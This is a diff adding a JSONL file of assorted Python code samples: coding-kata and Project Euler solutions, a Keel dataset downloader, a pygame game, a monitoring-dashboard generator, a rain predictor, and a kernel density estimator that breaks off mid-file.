diff --git "a/169.jsonl" "b/169.jsonl" new file mode 100644--- /dev/null +++ "b/169.jsonl" @@ -0,0 +1,695 @@ +{"seq_id":"637884083","text":"class Solution:\n def findRepeatedDnaSequences(self, s: str) -> List[str]:\n if not s or len(s) < 10:\n return []\n hash_map = {}\n res = []\n for i in range(10, len(s)+1):\n tmp = s[i-10:i]\n if tmp in hash_map and hash_map[tmp] == 1:\n res.append(tmp)\n hash_map[tmp] = hash_map.get(tmp, 0) + 1\n return res","sub_path":"187_重复的DNA序列.py","file_name":"187_重复的DNA序列.py","file_ext":"py","file_size_in_byte":395,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"421245403","text":"import math\nimport time\n\nstart = time.perf_counter()\n\nPrev2 = 0\nPrev = 1\nFin = 1\nTotal = 0\nwhile Fin <= 4e6:\n Fin = Prev2 + Prev\n Prev2 = Prev\n Prev = Fin\n if Fin/2 == math.floor(Fin/2):\n Total += Fin\n\nprint(Total)\n\nstop = time.perf_counter()\nsec = f\"{time} Seconds\"\nprint(stop-start)\n","sub_path":"Project Euler/Python/Euler2.py","file_name":"Euler2.py","file_ext":"py","file_size_in_byte":304,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"258220877","text":"'''In this simple Kata your task is to create a function that turns a string into a Mexican Wave. \nYou will be passed a string and you must return that string in an array where an uppercase letter is a person standing up.\n\n1. The input string will always be lower case but maybe empty.\n2. If the character in the string is whitespace then pass over it as if it was an empty seat.'''\n\n\ndef wave(input):\n Upper=input.upper()\n array = []\n i = 0\n while i < len(input):\n if input[i] != \" \":\n first = input[0:i]\n last = input[i+1:(len(input))]\n array.append(first + Upper[i] + last)\n i+=1\n \n # Miki no me odies :D \n \n return array\n\n\nif __name__ == \"__main__\":\n \n\n # TEST CASES #\n\n\n \n result = [\"Hello\", \"hEllo\", \"heLlo\", \"helLo\", \"hellO\"]\n assert wave(\"hello\") == result\n\n result2 = [\"Codewars\", \"cOdewars\", \"coDewars\", \"codEwars\", \"codeWars\", \"codewArs\", \"codewaRs\", \"codewarS\"]\n assert wave(\"codewars\") == result2\n\n result3 = []\n assert wave(\"\") == result3\n\n result4 = [\"Two words\", \"tWo words\", \"twO words\", \"two Words\", \"two wOrds\", \"two woRds\", \"two worDs\", \"two wordS\"]\n assert wave(\"two words\") == result4\n\n result5 = [\" Gap \", \" gAp \", \" gaP \"]\n assert wave(\" gap \") == result5\n","sub_path":"Python_katas/katas_6kyu/mexican_wave.py","file_name":"mexican_wave.py","file_ext":"py","file_size_in_byte":1262,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"333115109","text":"\"\"\"\nKeel datasets (http://sci2s.ugr.es/keel).\n\n@author: David Diaz Vico\n@license: MIT\n\"\"\"\n\nimport io\nimport numpy as np\nimport os\nimport pandas as pd\nfrom sklearn.datasets import get_data_home\nfrom sklearn.utils import Bunch\nfrom sklearn.model_selection import check_cv\nfrom sklearn.preprocessing import LabelEncoder, OrdinalEncoder\nfrom urllib.request import urlretrieve\nfrom zipfile import ZipFile\n\n\nBASE_URL = 'http://sci2s.ugr.es/keel'\nCOLLECTIONS = {'classification', 'missing', 'imbalanced', 'multiInstance',\n 'multilabel', 'textClassification', 'classNoise',\n 'attributeNoise', 'semisupervised', 'regression', 'timeseries',\n 'unsupervised', 'lowQuality'}\n\n\n# WTFs\nIMBALANCED_URLS = ['keel-dataset/datasets/imbalanced/imb_IRhigherThan9',\n 
'keel-dataset/datasets/imbalanced/imb_IRhigherThan9p1',\n 'keel-dataset/datasets/imbalanced/imb_IRhigherThan9p2',\n 'keel-dataset/datasets/imbalanced/imb_IRhigherThan9p3',\n 'dataset/data/imbalanced',\n 'keel-dataset/datasets/imbalanced/imb_noisyBordExamples',\n 'keel-dataset/datasets/imbalanced/preprocessed']\nIRREGULAR_DESCR_IMBALANCED_URLS = ['keel-dataset/datasets/imbalanced/imb_IRhigherThan9',\n 'keel-dataset/datasets/imbalanced/imb_IRhigherThan9p1',\n 'keel-dataset/datasets/imbalanced/imb_IRhigherThan9p2',\n 'keel-dataset/datasets/imbalanced/imb_IRhigherThan9p3']\nINCORRECT_DESCR_IMBALANCED_URLS = {'semisupervised': 'classification'}\n\n\ndef _load_Xy(zipfile, csvfile, sep=',', header=None, engine='python',\n na_values={'?'}, **kwargs):\n \"\"\"Load a zippend csv file with targets in the last column and features in\n the rest.\"\"\"\n with ZipFile(zipfile) as z:\n with z.open(csvfile) as c:\n s = io.StringIO(c.read().decode(encoding=\"utf8\"))\n data = pd.read_csv(s, sep=sep, header=header, engine=engine,\n na_values=na_values, **kwargs)\n X = pd.get_dummies(data.iloc[:, :-1])\n y = pd.factorize(data.iloc[:, -1].tolist(), sort=True)[0]\n return X, y\n\n\ndef _load_descr(collection, name, dirname=None):\n \"\"\"Load a dataset description.\"\"\"\n filename = name + '-names.txt'\n if collection == 'imbalanced':\n for url in IMBALANCED_URLS:\n if url in IRREGULAR_DESCR_IMBALANCED_URLS:\n url = BASE_URL + '/' + url + '/' + 'names' + '/' + filename\n else:\n url = BASE_URL + '/' + url + '/' + filename\n try:\n f = filename if dirname is None else os.path.join(dirname,\n filename)\n f, _ = urlretrieve(url, filename=f)\n break\n except:\n continue\n else:\n collection = INCORRECT_DESCR_IMBALANCED_URLS[collection] if collection in INCORRECT_DESCR_IMBALANCED_URLS else collection\n url = BASE_URL + '/' + 'dataset/data' + '/' + collection + '/' + filename\n f = filename if dirname is None else os.path.join(dirname, filename)\n f, _ = urlretrieve(url, filename=f)\n with open(f) as rst_file:\n fdescr = rst_file.read()\n nattrs = fdescr.count(\"@attribute\")\n return nattrs, fdescr\n\n\ndef _fetch_keel_zip(collection, filename, dirname=None):\n \"\"\"Fetch Keel dataset zip file.\"\"\"\n if collection == 'imbalanced':\n for url in IMBALANCED_URLS:\n url = BASE_URL + '/' + url + '/' + filename\n try:\n f = filename if dirname is None else os.path.join(dirname,\n filename)\n f, _ = urlretrieve(url, filename=f)\n break\n except:\n continue\n else:\n url = BASE_URL + '/' + 'dataset/data' + '/' + collection + '/' + filename\n f = filename if dirname is None else os.path.join(dirname, filename)\n f, _ = urlretrieve(url, filename=f)\n return f\n\n\ndef _load_folds(collection, name, nfolds, dobscv, nattrs, dirname=None):\n \"\"\"Load a dataset folds.\"\"\"\n filename = name + '.zip'\n f = _fetch_keel_zip(collection, filename, dirname=dirname)\n X, y = _load_Xy(f, name + '.dat', skiprows=nattrs + 4)\n cv = None\n if nfolds in (5, 10):\n fold = 'dobscv' if dobscv else 'fold'\n filename = name + '-' + str(nfolds) + '-' + fold + '.zip'\n f = _fetch_keel_zip(collection, filename, dirname=dirname)\n Xs = []\n ys = []\n Xs_test = []\n ys_test = []\n for i in range(nfolds):\n if dobscv:\n _name = os.path.join(name, name + '-' + str(nfolds) + 'dobscv-' + str(i + 1))\n else:\n _name = name + '-' + str(nfolds) + '-' + str(i + 1)\n _X, _y = _load_Xy(f, _name + 'tra.dat', skiprows=nattrs + 4)\n _X_test, _y_test = _load_Xy(f, _name + 'tst.dat',\n skiprows=nattrs + 4)\n Xs.append(_X)\n ys.append(_y)\n 
Xs_test.append(_X_test)\n ys_test.append(_y_test)\n cv = zip(Xs, ys, Xs_test, ys_test)\n return X, y, cv\n\n\ndef fetch(collection, name, data_home=None, nfolds=None, dobscv=False):\n \"\"\"Fetch Keel dataset.\n\n Fetch a Keel dataset by collection and name. More info at\n http://sci2s.ugr.es/keel.\n\n Parameters\n ----------\n collection : string\n Collection name.\n name : string\n Dataset name.\n data_home : string or None, default None\n Specify another download and cache folder for the data sets. By default\n all scikit-learn data is stored in ‘~/scikit_learn_data’ subfolders.\n nfolds : int, default=None\n Number of folds. Depending on the dataset, valid values are\n {None, 1, 5, 10}.\n dobscv : bool, default=False\n If folds are in {5, 10}, indicates that the cv folds are distribution\n optimally balanced stratified. Only available for some datasets.\n **kwargs : dict\n Optional key-value arguments\n\n Returns\n -------\n data : Bunch\n Dictionary-like object with all the data and metadata.\n\n \"\"\"\n if collection not in COLLECTIONS:\n raise Exception('Avaliable collections are ' + str(list(COLLECTIONS)))\n dirname = os.path.join(get_data_home(data_home=data_home), 'keel',\n collection, name)\n if not os.path.exists(dirname):\n os.makedirs(dirname)\n nattrs, DESCR = _load_descr(collection, name, dirname=dirname)\n X, y, cv = _load_folds(collection, name, nfolds, dobscv, nattrs,\n dirname=dirname)\n data = Bunch(data=X, target=y, data_test=None, target_test=None,\n inner_cv=None, outer_cv=cv, DESCR=DESCR)\n return data\n","sub_path":"skdatasets/repositories/keel.py","file_name":"keel.py","file_ext":"py","file_size_in_byte":6950,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"551886421","text":"import pygame\nimport time\nimport sys\nimport numpy\n\nfrom gamestate import *\nfrom container import *\nfrom entity import *\nfrom player import *\nfrom simpleplatformlevel import *\n\nwindowSize = (800, 600)\nbackgroundColor = 128, 128, 128\n\nrunning = True\ngameState = GameState(windowSize)\n\ndef userQuit():\n\tglobal running\n\trunning = False\n\ndef handleSpecialKeys(key):\n\tif key == pygame.K_ESCAPE:\n\t\tuserQuit()\n\telif key == pygame.K_F4:\n\t\tuserQuit()\n\ndef handleKeyUp(key):\n\thandleSpecialKeys(key)\n\tgameState.handleKeyUp(key)\n\ndef handleEvents():\n\tfor event in pygame.event.get():\n\t\tif event.type == pygame.QUIT:\n\t\t\tuserQuit()\n\t\tif event.type == pygame.KEYUP:\n\t\t\thandleKeyUp(event.key)\n\ndef drawHud(screen):\n\t# font = pygame.font.SysFont('Arial', 25)\n\t# textColor = (255, 255, 255)\n\t# position = (200, 100)\n\t# if gameState.player is not None:\n\t\t# text = 'Stamina: ' + str(int(gameState.player.stamina))\n\t# else:\n\t\t# text = ''\n\t# screen.blit(font.render(text, True, textColor), position)\n\tif gameState.player is not None:\n\t\tdisplayHealth(screen, gameState.player)\n\t\tdisplayStamina(screen, gameState.player)\n\ndef displayHealth(screen, player):\n\ttextColor = (255, 255, 255)\n\tposition = (200, 75)\n\ttext = 'Health: ' + str(int(player.health))\n\tdisplayText(screen, text, textColor, position)\n\ndef displayStamina(screen, player):\n\ttextColor = (255, 255, 255)\n\tposition = (200, 100)\n\ttext = 'Stamina: ' + str(int(player.stamina))\n\tdisplayText(screen, text, textColor, position)\n\ndef displayText(screen, text, textColor, position):\n\tfont = pygame.font.SysFont('Arial', 25)\n\tscreen.blit(font.render(text, True, textColor), position)\n\ndef 
drawGame(screen):\n\tscreen.fill(backgroundColor)\n\tgameState.draw(screen)\n\tdrawHud(screen)\n\tpygame.display.flip()\n\ndef gameLoop(screen):\n\twhile running:\n\t\thandleEvents()\n\t\tgameState.update()\n\t\tdrawGame(screen)\n\tsys.exit()\n\ndef initDisplay():\n\tpygame.init()\n\tscreen = pygame.display.set_mode(windowSize)\n\tpygame.display.set_caption(\"Sky Tower\")\n\treturn screen\n\ndef initGame():\n\tgameState.addPlayer(Player(50, -60, 20, 60))\n\tgenerateLevel()\n\ndef generateLevel():\n\tgenerator = SimplePlatformLevel();\n\tgenerator.generateLevel(gameState);\n\ndef hardcodedLevel():\n\tother = Entity(200, -150, 50, 25)\n\tother.gravity = False\n\tother.collisionType = physics.CollisionType.COLLIDEABLE_OBSTACLE\n\tgameState.addEntity(other)\n\tother = Entity(400, -150, 200, 25)\n\tother.gravity = False\n\tother.collisionType = physics.CollisionType.COLLIDEABLE_OBSTACLE\n\tgameState.addEntity(other)\n\ndef startGame():\n\tscreen = initDisplay()\n\tinitGame()\n\tgameLoop(screen)\n\nif __name__ == \"__main__\":\n\tstartGame()\n","sub_path":"skytower/game.py","file_name":"game.py","file_ext":"py","file_size_in_byte":2591,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"652866247","text":"#!/usr/bin/python\ndef main():\n\tprint(\"this is the functions.py file \")\n\tfor i in inclusive_range():\n\t\tprint(i)\n\ndef inclusive_range(*args):\n\tnumargs = len(args)\n\tif numargs < 1: raise TypeError('required atleast one argument')\n\telif numargs == 1:\n\t\tstop = args[0]\n\t\tstart = 0\n\t\tstep = 1\n\telif numargs == 2:\n\t\t(start, stop) = args\n\t\tstep = 1\n\telif numargs == 3:\n\t\t(start, stop, step) = args\n\telse: raise TypeError('inclusive_range expected atmost 3 arguments, got {}'.format(numargs))\n\ti = start\n\twhile i <= stop:\n\t\tyield i\n\t\ti += step\nif __name__ == \"__main__\": main()\n","sub_path":"python/code-4/funcyieldargs.py","file_name":"funcyieldargs.py","file_ext":"py","file_size_in_byte":569,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"584571069","text":"#johanc\nimport pygame\nfrom pygame.sprite import Sprite\nclass Ship(Sprite):\n\n def __init__(self, ai_settings, screen):\n super(Ship,self).__init__()\n '''Initializes the ship and sets its origin'''\n self.screen = screen\n self.ai_settings = ai_settings\n #load ship\n self.image = pygame.image.load('res/ship.bmp')\n self.rect = self.image.get_rect()\n self.screen_rect = screen.get_rect()\n #ship at the bottom\n self.rect.centerx = self.screen_rect.centerx\n self.rect.bottom = self.screen_rect.bottom\n #decimal value of ship's center\n self.center = float(self.rect.centerx)\n #Movement flag\n self.moving_right = False\n self.moving_left = False\n\n def center_ship(self):\n '''Centers ship'''\n self.center = self.screen_rect.centerx\n\n def update(self):\n '''Update position based on flag'''\n if self.moving_right and self.rect.right < self.screen_rect.right: #Makes sure it doesn't go off screen\n self.center += self.ai_settings.ship_speed_multiplier\n if self.moving_left and self.rect.left > 0:\n self.center -= self.ai_settings.ship_speed_multiplier\n self.rect.centerx = self.center\n\n def blitme(self):\n '''Draw ship'''\n self.screen.blit(self.image,self.rect)","sub_path":"ship.py","file_name":"ship.py","file_ext":"py","file_size_in_byte":1348,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"46593868","text":"import time\n\ndef 
plot_data(recent_logs):\n\t\"\"\"returns radar_data and line_data to be used for plotting radar and time series plots\"\"\"\n\n\tradar_data = dict()\n\tline_data = dict()\n\n\tradar_data['CPU_TEMP'] = 0\n\tradar_data['EMAIL'] = 0\n\tradar_data['GPU_TEMP'] = 0\n\tradar_data['PING'] = 0\n\tradar_data['SERVICE'] = 0\n\tradar_data['SMS'] = 0\n\tradar_data['UPS'] = 0\n\tradar_data['DC_ENV_CI_TEMP'] = 0\n\tradar_data['DC_ENV_CI_HUM'] = 0\n\tradar_data['DC_ENV_HI_TEMP'] = 0\n\tradar_data['DC_ENV_HI_HUM'] = 0\n\n\tfor log_i in recent_logs:\n\t\t# collect data for radar plot\n\t\tif (log_i[4].startswith('PING ')):\n\t\t\tif (radar_data['PING'] < int(log_i[3])):\n\t\t\t\tradar_data['PING'] = int(log_i[3])\n\t\telif (log_i[4].startswith('CPU_TEMP ')):\n\t\t\tif (radar_data['CPU_TEMP'] < int(log_i[3])):\n\t\t\t\tradar_data['CPU_TEMP'] = int(log_i[3])\n\t\telif (log_i[4].startswith('GPU_TEMP ')):\n\t\t\tif (radar_data['GPU_TEMP'] < int(log_i[3])):\n\t\t\t\tradar_data['GPU_TEMP'] = int(log_i[3])\n\t\telif (log_i[4].startswith('SERVICE ')):\n\t\t\tif (radar_data['SERVICE'] < int(log_i[3])):\n\t\t\t\tradar_data['SERVICE'] = int(log_i[3])\n\t\telif (log_i[4].startswith('UPS ')):\n\t\t\tif (radar_data['UPS'] < int(log_i[3])):\n\t\t\t\tradar_data['UPS'] = int(log_i[3])\n\t\telif (log_i[4].startswith('SMS ')):\n\t\t\tif (radar_data['SMS'] < int(log_i[3])):\n\t\t\t\tradar_data['SMS'] = int(log_i[3])\n\t\telif (log_i[4].startswith('EMAIL ')):\n\t\t\tif (radar_data['EMAIL'] < int(log_i[3])):\n\t\t\t\tradar_data['EMAIL'] = int(log_i[3])\n\t\telif (log_i[4].startswith('DC_ENV_CI_TEMP ')):\n\t\t\tif (radar_data['DC_ENV_CI_TEMP'] < int(log_i[3])):\n\t\t\t\tradar_data['DC_ENV_CI_TEMP'] = int(log_i[3])\n\t\telif (log_i[4].startswith('DC_ENV_CI_HUM ')):\n\t\t\tif (radar_data['DC_ENV_CI_HUM'] < int(log_i[3])):\n\t\t\t\tradar_data['DC_ENV_CI_HUM'] = int(log_i[3])\n\t\telif (log_i[4].startswith('DC_ENV_HI_TEMP ')):\n\t\t\tif (radar_data['DC_ENV_HI_TEMP'] < int(log_i[3])):\n\t\t\t\tradar_data['DC_ENV_HI_TEMP'] = int(log_i[3])\n\t\telif (log_i[4].startswith('DC_ENV_HI_HUM ')):\n\t\t\tif (radar_data['DC_ENV_HI_HUM'] < int(log_i[3])):\n\t\t\t\tradar_data['DC_ENV_HI_HUM'] = int(log_i[3])\n\n\t\t# collect data for time series plot\n\t\tuid = log_i[0]\n\t\tif (uid not in line_data.keys()):\n\t\t\tline_data[uid] = dict()\n\n\t\t\tline_data[uid]['PING'] = 0\n\t\t\tline_data[uid]['CPU_TEMP'] = 0\n\t\t\tline_data[uid]['GPU_TEMP'] = 0\n\t\t\tline_data[uid]['SERVICE'] = 0\n\t\t\tline_data[uid]['UPS'] = 0\n\t\t\tline_data[uid]['SMS'] = 0\n\t\t\tline_data[uid]['EMAIL'] = 0\n\t\t\tline_data[uid]['DC_ENV_CI_TEMP'] = 0\n\t\t\tline_data[uid]['DC_ENV_CI_HUM'] = 0\n\t\t\tline_data[uid]['DC_ENV_HI_TEMP'] = 0\n\t\t\tline_data[uid]['DC_ENV_HI_HUM'] = 0\n\n\t\tif (log_i[4].startswith('PING ')):\n\t\t\tif (line_data[uid]['PING'] < int(log_i[3])):\n\t\t\t\tline_data[uid]['PING'] = int(log_i[3])\n\t\telif (log_i[4].startswith('CPU_TEMP ')):\n\t\t\tif (line_data[uid]['CPU_TEMP'] < int(log_i[3])):\n\t\t\t\tline_data[uid]['CPU_TEMP'] = int(log_i[3])\n\t\telif (log_i[4].startswith('GPU_TEMP ')):\n\t\t\tif (line_data[uid]['GPU_TEMP'] < int(log_i[3])):\n\t\t\t\tline_data[uid]['GPU_TEMP'] = int(log_i[3])\n\t\telif (log_i[4].startswith('SERVICE ')):\n\t\t\tif (line_data[uid]['SERVICE'] < int(log_i[3])):\n\t\t\t\tline_data[uid]['SERVICE'] = int(log_i[3])\n\t\telif (log_i[4].startswith('UPS ')):\n\t\t\tif (line_data[uid]['UPS'] < int(log_i[3])):\n\t\t\t\tline_data[uid]['UPS'] = int(log_i[3])\n\t\telif (log_i[4].startswith('SMS ')):\n\t\t\tif 
(line_data[uid]['SMS'] < int(log_i[3])):\n\t\t\t\tline_data[uid]['SMS'] = int(log_i[3])\n\t\telif (log_i[4].startswith('EMAIL ')):\n\t\t\tif (line_data[uid]['EMAIL'] < int(log_i[3])):\n\t\t\t\tline_data[uid]['EMAIL'] = int(log_i[3])\n\t\telif (log_i[4].startswith('DC_ENV_CI_TEMP ')):\n\t\t\tif (line_data[uid]['DC_ENV_CI_TEMP'] < int(log_i[3])):\n\t\t\t\tline_data[uid]['DC_ENV_CI_TEMP'] = int(log_i[3])\n\t\telif (log_i[4].startswith('DC_ENV_CI_HUM ')):\n\t\t\tif (line_data[uid]['DC_ENV_CI_HUM'] < int(log_i[3])):\n\t\t\t\tline_data[uid]['DC_ENV_CI_HUM'] = int(log_i[3])\n\t\telif (log_i[4].startswith('DC_ENV_HI_TEMP ')):\n\t\t\tif (line_data[uid]['DC_ENV_HI_TEMP'] < int(log_i[3])):\n\t\t\t\tline_data[uid]['DC_ENV_HI_TEMP'] = int(log_i[3])\n\t\telif (log_i[4].startswith('DC_ENV_HI_HUM ')):\n\t\t\tif (line_data[uid]['DC_ENV_HI_HUM'] < int(log_i[3])):\n\t\t\t\tline_data[uid]['DC_ENV_HI_HUM'] = int(log_i[3])\n\n\tmax_c = radar_data[max(radar_data, key = radar_data.get)]\n\n\treturn (radar_data, line_data, max_c)\n\ndef template_to_index(template_lines, radar_data, line_data, max_c):\n\t\"\"\"generates content for index.html\"\"\"\n\n\tindex_file = list()\n\tfor line in template_lines:\n\t\tif (line.endswith('CRIMSON_RADAR_1')):\n\t\t\thtml_lines = '\\t\\t\\t\\t\\t\\t{}, {}, {}, {}, {}, {}, {},{}, {}, {}, {},'.format(radar_data['PING'], \\\n\t\t\t\tradar_data['CPU_TEMP'], radar_data['GPU_TEMP'], radar_data['SERVICE'], \\\n\t\t\t\tradar_data['UPS'], radar_data['SMS'], radar_data['EMAIL'],\n\t\t\t\tradar_data['DC_ENV_CI_TEMP'], radar_data['DC_ENV_CI_HUM'],\n\t\t\t\tradar_data['DC_ENV_HI_TEMP'], radar_data['DC_ENV_HI_HUM'],)\n\t\t\tindex_file.append(html_lines)\n\t\telif (line.endswith('CRIMSON_LINE_PING')):\n\t\t\tfor uid in sorted(line_data.keys()):\n\t\t\t\thtml_lines = '\\t\\t\\t\\t\\t\\t\\t{{ x: \"{}\", y: {} }},'.format(uid, line_data[uid]['PING'])\n\t\t\t\tindex_file.append(html_lines)\n\t\telif (line.endswith('CRIMSON_LINE_CPU_TEMP')):\n\t\t\tfor uid in sorted(line_data.keys()):\n\t\t\t\thtml_lines = '\\t\\t\\t\\t\\t\\t\\t{{ x: \"{}\", y: {} }},'.format(uid, line_data[uid]['CPU_TEMP'])\n\t\t\t\tindex_file.append(html_lines)\n\t\telif (line.endswith('CRIMSON_LINE_GPU_TEMP')):\n\t\t\tfor uid in sorted(line_data.keys()):\n\t\t\t\thtml_lines = '\\t\\t\\t\\t\\t\\t\\t{{ x: \"{}\", y: {} }},'.format(uid, line_data[uid]['GPU_TEMP'])\n\t\t\t\tindex_file.append(html_lines)\n\t\telif (line.endswith('CRIMSON_LINE_SERVICE')):\n\t\t\tfor uid in sorted(line_data.keys()):\n\t\t\t\thtml_lines = '\\t\\t\\t\\t\\t\\t\\t{{ x: \"{}\", y: {} }},'.format(uid, line_data[uid]['SERVICE'])\n\t\t\t\tindex_file.append(html_lines)\n\t\telif (line.endswith('CRIMSON_LINE_UPS')):\n\t\t\tfor uid in sorted(line_data.keys()):\n\t\t\t\thtml_lines = '\\t\\t\\t\\t\\t\\t\\t{{ x: \"{}\", y: {} }},'.format(uid, line_data[uid]['UPS'])\n\t\t\t\tindex_file.append(html_lines)\n\t\telif (line.endswith('CRIMSON_LINE_SMS')):\n\t\t\tfor uid in sorted(line_data.keys()):\n\t\t\t\thtml_lines = '\\t\\t\\t\\t\\t\\t\\t{{ x: \"{}\", y: {} }},'.format(uid, line_data[uid]['SMS'])\n\t\t\t\tindex_file.append(html_lines)\n\t\telif (line.endswith('CRIMSON_LINE_EMAIL')):\n\t\t\tfor uid in sorted(line_data.keys()):\n\t\t\t\thtml_lines = '\\t\\t\\t\\t\\t\\t\\t{{ x: \"{}\", y: {} }},'.format(uid, line_data[uid]['EMAIL'])\n\t\t\t\tindex_file.append(html_lines)\n\t\telif (line.endswith('CRIMSON_LINE_DC_ENV_CI_TEMP')):\n\t\t\tfor uid in sorted(line_data.keys()):\n\t\t\t\thtml_lines = '\\t\\t\\t\\t\\t\\t\\t{{ x: \"{}\", y: {} }},'.format(uid, 
line_data[uid]['DC_ENV_CI_TEMP'])\n\t\t\t\tindex_file.append(html_lines)\n\t\telif (line.endswith('CRIMSON_LINE_DC_ENV_CI_HUM')):\n\t\t\tfor uid in sorted(line_data.keys()):\n\t\t\t\thtml_lines = '\\t\\t\\t\\t\\t\\t\\t{{ x: \"{}\", y: {} }},'.format(uid, line_data[uid]['DC_ENV_CI_HUM'])\n\t\t\t\tindex_file.append(html_lines)\n\t\telif (line.endswith('CRIMSON_LINE_DC_ENV_HI_TEMP')):\n\t\t\tfor uid in sorted(line_data.keys()):\n\t\t\t\thtml_lines = '\\t\\t\\t\\t\\t\\t\\t{{ x: \"{}\", y: {} }},'.format(uid, line_data[uid]['DC_ENV_HI_TEMP'])\n\t\t\t\tindex_file.append(html_lines)\n\t\telif (line.endswith('CRIMSON_LINE_DC_ENV_HI_HUM')):\n\t\t\tfor uid in sorted(line_data.keys()):\n\t\t\t\thtml_lines = '\\t\\t\\t\\t\\t\\t\\t{{ x: \"{}\", y: {} }},'.format(uid, line_data[uid]['DC_ENV_HI_HUM'])\n\t\t\t\tindex_file.append(html_lines)\n\t\telif ('CRIMSON_CRITICALITY' in line):\n\t\t\thtml_lines = line\n\t\t\thtml_lines = html_lines.replace('CRIMSON_CRITICALITY', str(max_c))\n\t\t\tindex_file.append(html_lines)\n\t\telse:\n\t\t\thtml_lines = line\n\t\t\tindex_file.append(html_lines)\n\n\treturn index_file\n\ndef other_files(recent_logs):\n\t\"\"\"generates content for complete.csv and abnormalities.html\"\"\"\n\n\ttable_head = \"\"\"\n\t<html>\n\t<body>\n\t<table>\n\t\t<thead></thead>\n\t\t<tbody>\n\t\"\"\"\n\n\ttable_tail = \"\"\"\n\t\t\t</tbody>\n\t\t</table>\n\t</body>\n\t</html>\n\t\"\"\"\n\n\tcomplete_csv_file = list()\n\tabnormalities_html_file = list()\n\tabnormalities_html_file.append(table_head)\n\tfor log_i in recent_logs:\n\t\tc_line = '{},{},{},{},{},{}'.format(log_i[0], log_i[1], log_i[2], log_i[3], log_i[4], log_i[5])\n\t\tcomplete_csv_file.append(c_line)\n\n\t\tif (log_i[3] > 1):\n\t\t\tepoch_time = log_i[5]\n\t\t\tdisp_time = time.strftime('%Y-%b-%d %H:%M:%S', time.localtime(epoch_time))\n\n\t\t\tc1 = '\\t\\t<tr>'\n\t\t\tc2 = '\\t\\t\\t<td> {} </td>'.format(disp_time)\n\t\t\tc3 = '\\t\\t\\t<td> {} </td>'.format(log_i[1])\n\t\t\tc4 = '\\t\\t\\t<td> {} </td>'.format(log_i[3])\n\t\t\tc5 = '\\t\\t\\t<td> {} </td>'.format(log_i[4])\n\t\t\tc6 = '\\t\\t</tr>'\n\n\t\t\tabnormalities_html_file.append(c1)\n\t\t\tabnormalities_html_file.append(c2)\n\t\t\tabnormalities_html_file.append(c3)\n\t\t\tabnormalities_html_file.append(c4)\n\t\t\tabnormalities_html_file.append(c5)\n\t\t\tabnormalities_html_file.append(c6)\n\n\tabnormalities_html_file.append(table_tail)\n\n\treturn (complete_csv_file, abnormalities_html_file)\n\n","sub_path":"codes/crimson_cloud/modules/crimson_web.py","file_name":"crimson_web.py","file_ext":"py","file_size_in_byte":8868,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"}
+{"seq_id":"448382296","text":"import glob\nfrom fpdf import FPDF\n\nimages = glob.glob(\"/Users/laurence/Desktop/rasters/lock_to_reward/*.png\")\npdf = FPDF()\n\n# imagelist is the list with all image filenames\nfor image in images:\n    pdf.add_page()\n    pdf.image(image,0,0,210,297)\npdf.output(\"reward_rasters.pdf\", \"F\")\n","sub_path":"data_visulisations/convert_to_PDF.py","file_name":"convert_to_PDF.py","file_ext":"py","file_size_in_byte":284,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"}
+{"seq_id":"414945636","text":"'''A teacher wants to raffle one of his four students to erase the whiteboard.\nWrite a program that helps him, reading their names and printing the name of the chosen one'''\nimport random\naluno1 = str(input(\"What is the name of student 1: \"))\naluno2 = str(input(\"What is the name of student 2: \"))\naluno3 = str(input(\"What is the name of student 3: \"))\naluno4 = str(input(\"What is the name of student 4: \"))\nlista = [aluno1, aluno2, aluno3, aluno4]\nescolhido = random.choice(lista)\nprint(\"The chosen student was {}\".format(escolhido))\n","sub_path":"ex019.py","file_name":"ex019.py","file_ext":"py","file_size_in_byte":498,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"}
+{"seq_id":"240194706","text":"import pandas as pd\nimport numpy as np\nfrom sklearn.externals.six import StringIO \nfrom sklearn.model_selection import train_test_split\nfrom sklearn.ensemble import RandomForestRegressor\nfrom sklearn import preprocessing\nfrom numpy import array\nfrom sklearn.model_selection import cross_val_predict\n\nrf = RandomForestRegressor(n_estimators=1000, random_state=42)\n\n\ndef init():\n    features = pd.read_csv('weather_data.csv')\n    features = pd.get_dummies(features)\n    features.iloc[:, 5:].head(5)\n    labels = np.array(features['precipm'])\n    features = features.drop('minpressurem', axis=1)\n    features = features.drop('maxpressurem', axis=1)\n    features = features.drop('meandewptm', axis=1)\n    features = features.drop('maxdewptm', axis=1)\n    features = features.drop('mindewptm', axis=1)\n    feature_list = list(features.columns)\n    print(feature_list)\n    features = np.array(features)\n    train_features, test_features, train_labels, test_labels = train_test_split(features, labels, test_size = 0.30, 
random_state = 42)\n\n rf.fit(train_features, train_labels)\n # predict(test_features)\n\n\ndef predict(tup):\n predictions = rf.predict(tup)\n result = np.mean(predictions)\n new_res = (result / 24) * 10\n probability_of_no_rainfall = (new_res * 0.5)\n print(1 - probability_of_no_rainfall)\n return 1 - probability_of_no_rainfall\n\n\ninit()\n","sub_path":"Irrigation prediction/rain_predictor.py","file_name":"rain_predictor.py","file_ext":"py","file_size_in_byte":1367,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"211392252","text":"import matplotlib.pyplot as plt\nimport numpy as np\nfrom smolaClass.genTestData import data\nfrom scipy.stats import truncnorm\n\n\nclass kernelDensityEstimator:\n\n def __init__(self, data=None, h=None, kernel=\"gauss\", truncLvl=5):\n self.data = data\n self.h = h\n self.kernel = kernel\n self.truncLvl = truncLvl\n np.seterr(all='raise')\n\n\n def applyKernel(self, x, h=None, data=None):\n n = len(data)\n arg = (x - data) / h\n if self.kernel==\"gauss\":\n exponent = -1/2*(arg)**2\n exp = 